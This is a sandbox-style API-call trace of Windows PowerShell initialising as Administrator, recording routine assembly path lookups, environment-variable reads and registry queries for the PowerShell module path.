	[0110.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.225] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0110.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.383] SetConsoleCtrlHandler (HandlerRoutine=0x2a468dc, Add=1) returned 1
	[0110.528] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.528] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.535] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0110.535] CoCreateGuid (in: pguid=0xcda70 | out: pguid=0xcda70*(Data1=0x2b11a270, Data2=0xdde7, Data3=0x41b3, Data4=([0]=0xa2, [1]=0x15, [2]=0x1d, [3]=0xce, [4]=0x5e, [5]=0x88, [6]=0x4e, [7]=0x50))) returned 0x0
	[0110.536] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.536] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.539] WinSqmIsOptedIn () returned 0x0
	[0110.539] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.539] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.540] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.540] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.540] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.541] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.541] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.541] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.542] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.542] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.543] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.543] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.544] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.544] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.544] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.544] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.546] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.546] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.548] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.548] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.549] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.549] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.549] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.549] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.776] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.776] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0110.776] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.786] CoTaskMemAlloc (cb=0xcc) returned 0x22fa90
	[0110.786] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22fa90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0110.786] CoTaskMemFree (pv=0x22fa90) 
	[0110.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x328) returned 0x0
	[0110.787] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd56c, lpData=0x0, lpcbData=0xcd568*=0x0 | out: lpType=0xcd56c*=0x2, lpData=0x0, lpcbData=0xcd568*=0x6c) returned 0x0
	[0110.787] CoTaskMemAlloc (cb=0x70) returned 0x1c9b30
	[0110.787] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd53c, lpData=0x1c9b30, lpcbData=0xcd538*=0x6c | out: lpType=0xcd53c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd538*=0x6c) returned 0x0
	[0110.787] CoTaskMemFree (pv=0x1c9b30) 
	[0110.787] CoTaskMemAlloc (cb=0xcc) returned 0x22fa90
	[0110.787] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x22fa90, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0110.787] CoTaskMemFree (pv=0x22fa90) 
	[0110.787] CoTaskMemAlloc (cb=0xcc) returned 0x22fa90
	[0110.787] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22fa90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0110.787] CoTaskMemFree (pv=0x22fa90) 
	[0110.789] RegCloseKey (hKey=0x328) returned 0x0
	[0110.789] CoTaskMemAlloc (cb=0xcc) returned 0x22fa90
	[0110.790] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x22fa90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0110.790] CoTaskMemFree (pv=0x22fa90) 
	[0110.790] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x328) returned 0x0
	[0110.790] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd56c, lpData=0x0, lpcbData=0xcd568*=0x0 | out: lpType=0xcd56c*=0x0, lpData=0x0, lpcbData=0xcd568*=0x0) returned 0x2
	[0110.790] RegCloseKey (hKey=0x328) returned 0x0
	[0110.794] CoTaskMemAlloc (cb=0x20c) returned 0x1b843970
	[0110.794] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b843970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0110.796] CoTaskMemFree (pv=0x1b843970) 
	[0110.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0110.797] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0110.798] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.798] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.799] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.799] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.801] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.801] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.801] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.802] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.803] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3d8 | out: phkResult=0xcd3d8*=0x330) returned 0x0
	[0110.804] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd3ec, lpData=0x0, lpcbData=0xcd3e8*=0x0 | out: lpType=0xcd3ec*=0x1, lpData=0x0, lpcbData=0xcd3e8*=0x74) returned 0x0
	[0110.805] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd35c, lpData=0x0, lpcbData=0xcd358*=0x0 | out: lpType=0xcd35c*=0x1, lpData=0x0, lpcbData=0xcd358*=0x74) returned 0x0
	[0110.805] CoTaskMemAlloc (cb=0x78) returned 0x1c9b30
	[0110.805] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd32c, lpData=0x1c9b30, lpcbData=0xcd328*=0x74 | out: lpType=0xcd32c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd328*=0x74) returned 0x0
	[0110.805] CoTaskMemFree (pv=0x1c9b30) 
	[0110.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0110.805] SetErrorMode (uMode=0x1) returned 0x1
	[0110.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd2b0 | out: lpFileInformation=0xcd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0110.806] SetErrorMode (uMode=0x1) returned 0x1
	[0110.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.806] SetErrorMode (uMode=0x1) returned 0x1
